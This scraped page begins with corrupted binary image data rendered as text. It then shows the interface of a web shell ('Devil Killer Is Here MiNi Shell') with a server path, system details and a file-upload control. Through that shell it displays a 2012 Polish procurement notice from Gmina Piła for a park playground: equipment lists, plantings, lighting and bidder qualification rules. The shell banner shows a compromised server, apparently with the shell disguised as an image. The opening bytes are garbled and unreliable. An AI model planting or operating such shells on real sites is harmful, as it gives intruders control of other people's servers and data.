JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120319/63033-N-2012.html

<p class="kh_header"><b>Piła: Rewitalizacja Parku na Wyspie - plac zabaw  (II przetarg)</b><br>
<b>Numer ogłoszenia: 63033 - 2012; data zamieszczenia: 19.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Piła , Pl. Staszica 10, 64-920 Piła, woj. wielkopolskie, tel. 067 2126210, faks 067 2123566.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.pila.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja Parku na Wyspie - plac zabaw  (II przetarg).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia.
Plac zabaw obejmuje obszar o powierzchni ok. 7 360 m2, na działkach o numerach geodezyjnych 15łamane1, 254, 255łamane3, 255łamane4 w Pile, obręb 0016.
Obszar placu  zabaw będzie podzielony na trzy grupy wiekowe: dzieci najmłodsze, dzieci starsze, młodzież.
Przedmiot zamówienia określa projekt budowlany wraz z częścią kosztorysową oraz Szczegółową   Specyfikacją Techniczną , stanowiące integralną część SIWZ. 
 W ramach przedmiotu zamówienia należy wykonać:
I. Przed przystąpieniem do prac wykonawczych należy przeprowadzić następujące roboty rozbiórkowe i porządkowe: 
a) rozbiórka nawierzchni z kostki kamiennej, ok. 8,00 mkw 
b) demontaż istniejących elementów wyposażenia terenu:
    - drewniane ławki - 9 szt.
    - piaskownica drewniana 3,25 x 3,25 m - 1 szt.
    - huśtawka ważka drewniana z oponami - 2 szt. 
    - huśtawka wahadłowa drewniana - 1 szt. 
    - metalowy stolik - 1 szt.
    - kosze plastikowe na stalowej nodze - 5 szt. 
c) przesadzenie 11 szt. krzewów liściastych (sumak octowiec - Rhus typhina oraz śliwa - Prunus) 
d) wycinka 5 drzew liściastych (topola czarna - Populus nigra), (Decyzja - ŚR.613.96.2011.VII z dnia 21.12.2011r.)
II. Place zabaw:
1) plac zabaw dla dzieci najmłodszych:
     a) huśtawka wahadłowa podwójna z siedziskiem typu pampers - ze stali nierdzewnej
     b) karuzela czteroramienna z płytą - z profilu stalowego zamkniętego czterema siedziskami z  oparciem
     c) piaskownica 6-kątna - wykonana ze stali, drewna oraz HDPE
     d) huśtawka sprężynowiec Żaba - bujak ze stelażem z polietylenu ciśnieniowego HDPE gr. 15 mm w kształcie żaby
     e) huśtawka sprężynowiec Koniczynka - bujak ze stelażem z polietylenu ciśnieniowego HDPE gr. 15 mm w kształcie koniczyny, przeznaczony dla czworga dzieci.
2) plac zabaw dla dzieci starszych:
     a) huśtawka Bocianie Gniazdo - ze stali nierdzewnej, z siedziskiem typu kosz 
     b) linarium typu Macro Spacenet - o wysokości ok. 5,35 m
     c) huśtawka sprężynowiec Deska surfingowa - bujak wykonany z profilu stalowego zamkniętego i HDPE w kształcie deski surfingowej
     d) huśtawka sprężynowiec Delfin - 2 szt. - bujak wykonany z profilu stalowego zamkniętego i HDPE w kształcie delfina
     e) zestaw zabawowy Statek Piracki - zestaw zabawowy wykonany ze stali, płyt HDPE, sklejek wodoodpornych oraz lin
     f) huśtawka-gondola - urządzenie typu huśtawka wagowa z ruchomą platformą w kształcie  wygiętej deski do surfowania zawieszonej na stalowej konstrukcji
     g) huśtawka sprężynowiec Ośmiornica - 4-osobowa z paneli HDPE montowanych na stelażach ze stali galwanizowanej
     h) huśtawka wahadłowa podwójna z siedziskiem typu deseczka - ze stali nierdzewnej, z  siedziskiem prostym, bez oparcia
3) plac zabaw dla młodzieży:
     a) stół do gry w piłkarzyki - konstrukcja z betonu klasy B30, blat z betonu z kruszywem  ozdobnym
     b) stół do tenisa stołowego - 2 szt.- stół z wysokogatunkowego betonu z kruszywem, szlifowany i  lakierowany
     c) kosz do gry koszykówkę - tablica do koszykówki z kraty stalowej na stalowym słupie z wysięgnikiem dł. 80 cm
Szczegółowe rozwiązania wg dokumentacji projektowej oraz SST.  
Każde urządzenie musi  posiadać  certyfikat uprawniający do oznaczania wyrobu znakiem bezpieczeństwa lub deklaracje zgodności z normami.
III.  Elementy małej architektury: 
1) ławka z oparciem - 8 szt. - profil zamknięty ze stali czarnej oraz siedzisko z drewna egzotycznego
2) ławka młodzieżowa - 4 szt. - profil zamknięty ze stali czarnej oraz siedzisko z drewna egzotycznego
3) ławka okrągła - 1 szt. - wokół drzewa ze ze stali czarnej oraz siedzisko z drewna
egzotycznego
4) kosz - 7 szt. - ze stali czarnej
5) kosz do segregacji śmieci - 3 szt. - z blachy perforowanej i profilu zamkniętego ze stali
6) stojak na rowery - 3 szt. - z profilu stalowego ze stali kwasoodpornej
7) tablica informacyjna ogólna - 1 szt. - konstrukcja: stal i żeliwo lakierowane; tablica: stal lakierowana i kompozyt polimerowy; pow. ekspozycyjna: płyta PCV
8) tablica informacyjna szczegółowa - 3 szt. - konstrukcja: stal i żeliwo lakierowane; tablica:  stal lakierowana i kompozyt polimerowy; pow. ekspozycyjna: płyta PCV
9) drewniana altana - 3 szt., pomalowane na ciemny brąz
Szczegółowe rozwiązania wg dokumentacji projektowej oraz SST.  
IV. Ogrodzenie placu zabaw dla dzieci najmłodszych oraz starszych dzieci:
panelowe, ocynkowane i lakierowane proszkowo (w kolorze grafitowym); - wysokość 1 m i dł. 138,76 m
- 4 furtki szerokości 1 m 
- 3 bramy dwuskrzydłowe o szer. 3 m
Szczegółowe rozwiązania wg dokumentacji projektowej oraz SST.  
V. Nawierzchnie:
1) żwirowa piesza - na ścieżkach pieszych, ok. 360,11 mkw
2)  żwirowa o wzmocnionej podbudowie - na ścieżkach pieszo-jezdnych, umożliwiających dojazd służb technicznych i ratunkowych do placu zabaw, ok. 168,14 mkw
3) z kostki betonowej - na placu dla młodzieży, ok. 170,18 mkw
4) ze żwiru luźnego płukanego - na placu zabaw dla najmłodszych i starszych dzieci, ok. 543,70 mkw 
5) syntetyczna - na placu zabaw dla starszych dzieci, ok. 216,12 mkw
Wszystkie nawierzchnie wykonane są w obrzeżach betonowych 8x30x100. 
Szczegółowe rozwiązania wg dokumentacji projektowej oraz SST.  
VI.  Szata roślinna: nasadzenia:
1) drzewa liściaste 
    - platan klonolistny (Platanus xacerifolia) - 2 szt.
    - klon pospolity (Acer platanoides Crimson King) - 3 szt.
2) drzewa iglaste 
    - daglezja zielona (Pseudotsuga menziesii) - 1 szt. 
3) krzewy 
    - pęcherznica kalinolistna (Physocarpus opulifolius Luteus) - 16 szt.
    - tawuła szara ( Spiraea cinerea Grefsheim) - 32 szt.
    - krzewuszka cudowna (Weigela Pink Prince) - 16 szt.
    - forsycja odm. Maluch ( Forsythia Maluch) - 31 szt.
    - tawuła gestokwiatowa (Spiraea densiflora) - 16 szt. 
    - lilak Meyera (Syringa meyeri Palbin) - 114 szt. 
    - krzewuszka cudowna (Weigela florida Nana Purpurea) - 32 szt. 
4) krzewy okrywowe
     - irga Dammera (Cotoneaster dammeri Major) - 185 szt.
     - tawulec pogiety ( Stephanandra incisa Crispa) - 92 szt. 
     - barwinek pospolity (Vinca minor) - 585 szt. 
5) trawy ozdobne
    - wyczyniec łąkowy (Alopecurus pratensis Aureovariegatus) - 108 szt.
    - rajgras wyniosły (Arrhrnatheum elatius subsp. Bulbosum Variegatum)- 53 szt. 
    - kostrzewa olbrzymia (Festuca gigantea) - 28 szt. 
    - miskant cukrowy (Miscanthus sacchariflorus) - 31 szt. 
    - miskant chiński (Miscanthus sinensis Silberspinne) - 14 szt.
    - proso rózgowe (Panicum virgatum Warrior) - 30 szt. 
Szczegółowe rozwiązania wg dokumentacji projektowej oraz SST.  
VII. Oświetlenie i przyłącza energetyczne.
1) oświetlenie:
    - 12 sztuk lamp parkowych, w oparciu o kompozytowy słup oświetlenia parkowego ze złączem   słupowym oraz oprawą
   -  dla uzyskania efektów wizualnych zaprojektowano 4 iluminatory, wykorzystując do tego okrągłą   oprawę wpuszczaną do instalacji w gruncie
    - zasilanie lamp kablem typu YKY 3x6 mmkw 
    - każda z lamp powinna być zabezpieczona wyłącznikiem S301 C4A
2) przyłącze energetyczne:
    - szafka pomiarowo-sterująca SO wraz z kablem zasilającym typu YAKY 4x50 mmkw o dł. ok.45 m. 
      Lokalizacja szafki oświetleniowej pomiarowo-sterującej SO przewidziana jest w pobliżu stacji  transformatorowej nr 1161, tak aby można było z niej zasilić dwa systemy oświetlenia. W miejsce  dotychczasowej szafki SO zaprojektowano nową szafkę oświetleniową SO-4 z funkcją wyłącznie  rozdzielczą.
Szczegółowe rozwiązania wg dokumentacji projektowej oraz SST.  
Ponadto: 
1) Wykonawca przeprowadzi wizje lokalną na terenie realizacji zamówienia i w jego okolicy w celu dokonania oceny dokumentów i informacji przekazanych w ramach niniejszego zamówienia przez Zamawiającego
2) Wykonawca zobowiązany jest zapoznać się z dokumentacją budowlano - kosztorysową wraz z SST oraz dołożyć najwyższej staranności w celu prawidłowego sporządzenia oferty, a zwłaszcza rzetelnego wyliczenia ceny oferty adekwatnej dla realizacji przedmiotu zamówienia
3) Wykonanie na własny koszt w ramach zaoferowanej ceny dokona wszelkich niezbędnych na czas prowadzenia budowy robót przygotowawczych i zabezpieczeniowych, ewentualne odwodnienie terenu placu budowy na czas prowadzenia robót (jeśli taka konieczność wystąpi). 
4) Wykonawca zapewni pełną obsługę geotechniczną i geodezyjną zadania
5) Sporządzenie przez kierownika budowy planu bezpieczeństwa i ochrony zdrowia oraz wypełnienie na własny koszt warunków tam określonych, związanych z bezpieczeństwem i ochroną zdrowia
6) Opracowanie projektu organizacji ruchu na czas budowy oraz projekt organizacji budowy poniesienie wszelkich kosztów z tym związanych na przykład z zapewnieniem transportu technologicznego materiałów, poniesieniem kosztów zajęcia terenu na czas prowadzenia robót budowlanych
7) Dokonanie wszelkich koniecznych wymaganych zgłoszeń i powiadomień, uzyskanie ewentualnych dodatkowych decyzji, w szczególności wynikających z Opinii ZUD (TP S.A., ENEA S.A., ZDiZ, itp.), decyzji pozwolenia na budowę, przepisów Prawa budowlanego wraz z ewentualnym poniesieniem wszelkich kosztów z tego tytułu
8)  Wykonanie wszystkich niezbędnych prób, badań i sprawdzeń
9) Należy wykonać dokumentację fotograficzną przed i po zakończeniu zadania, którą Wykonawca dostarczy do Zamawiającego na nośniku elektronicznym
10) Po wykonaniu przedmiotu zamówienia Wykonawca zobowiązany jest do przeprowadzenia rocznych technicznych przeglądów urządzeń i poniesienia wszelkich kosztów z tym związanych za cenę w ofercie, w okresie gwarancji
11) Przygotowanie oraz przekazanie dokumentacji powykonawczej budowy (2 komplety ze spisem zawartości) wraz z inwentaryzacją geodezyjną powykonawczą - 8 egz.
12) Przedstawienie do dokumentacji powykonawczej pełnego szczegółowego zestawienia rzeczowo-finansowego wykonanych środków trwałych i wyposażenia 
13) Wykonanie, dostarczenie i ustawienie na terenie placu budowy tablicy informacyjnej o wymiarach 2 x 1 m (wzór poglądowy w załączeniu), zawierającej:
- tytuł zadania: Budowa bezpiecznego dla dzieci miejskiego placu zabaw na wyspie w Pile
- wartość zadania, w zaokrągleniu do liczb całkowitych 
- logotyp Miasta Piły
- logotyp współfinansującego przedsięwzięcie, z hasłem Dofinansowano z Funduszu
Prewencyjnego PZU SA oraz Dofinansowano z Funduszu Prewencyjnego PZU Życie SA
Projekt należy uzgodnić i uzyskać akceptację Zamawiającego oraz PZU SA i PZU Życie SA
Tablica winna być wykonana w trwałości zapewniającej jej istnienie podczas czasu
realizacji zadania. Umocowanie stabilne, na wysokość zapewniającą jej czytelność. Koszt zrealizowania  tablicy należy uwzględnić w tak zwanych kosztach ogólnych realizowanych  prac.
14) Wykonawca zobowiązany jest do wykonania, dostarczenia i ustawienia tablicy pamiątkowej o wykonanym przedsięwzięciu. Analogicznie, na tablicy powinny być zawarte wszystkie informacje, takie jak na tablicy informacyjnej. Tablica powinna być wykonana z trwałego materiału, odpornego na warunki meteorologiczne. Minimalna wielkość tablicy 30 x 40 cm. Projekt graficzny i rozmieszczenie treści na niniejszej tablicy do uzgodnienia z Zamawiającym oraz  PZU SA i PZU Życie SA.
Umocowanie stabilne, na wysokość zapewniającą jej czytelność. Koszt zrealizowania tablicy należy uwzględnić w tak zwanych kosztach ogólnych realizowanych prac..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-1, 45.21.21.40-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 11.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 16000,00 (słownie: Szesnaście tysięcy zł )</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w okresie ostatnich 3 lat przed dniem wszczęcia postępowania  o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie  zrealizował  co najmniej 2 zadania związane z budową placów zabaw  w zakresie dostawy i montażu co najmniej 6 urządzeń zabawowych  z podaniem ich rodzaju   i wartości, daty i miejsca wykonania,  oraz załączeniem dokumentu potwierdzającego, że te dostawy  zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować  następującymi osobami posiadającymi doświadczenie i kwalifikacje
odpowiednie do stanowisk, jakie zostaną tym osobom powierzone, spełniającymi poniższe  wymagania:  
Kierownik budowy  -  uprawnienia budowlane w specjalności konstrukcyjno  - budowlane,  
- min. 2 lata  doświadczenia  zawodowego po  uzyskaniu   uprawnień
Kierownik robót elektrycznych  - uprawnienia budowlane  w  danej specjalności ; 
- min. 2 lata doświadczenia  zawodowego  po uzyskaniu  uprawnień</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać:
1) dysponowanie własnymi środkami finansowymi (dopuszczalne jest tu wskazanie środków z kredytu obrotowego lub innego, o ile środki te nie są przeznaczone na zrealizowanie konkretnego celu) lub zdolnością kredytową w wysokości nie mniejszej niż 500 tys. zł  (słownie: pięćset tysięcy zł  )
2) posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.  
Wykonawca, którego oferta wybrana zostanie jako najkorzystniejsza, przed podpisaniem umowy przedłoży polisę lub inny dokument ubezpieczeniowy potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie niższą niż  500 tys. zł  (słownie: pięćset tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Pełnomocnictwo do reprezentowania w postępowaniu, ( w przypadku podmiotów występujących wspólnie) - przygotowane zgodnie z zapisami części VII pkt. 4 SIWZ.
2) Parafowany projekt  umowy  - załącznik nr 5 do SIWZ
3) Podwykonawstwo - załącznik nr 4 do SIWZ
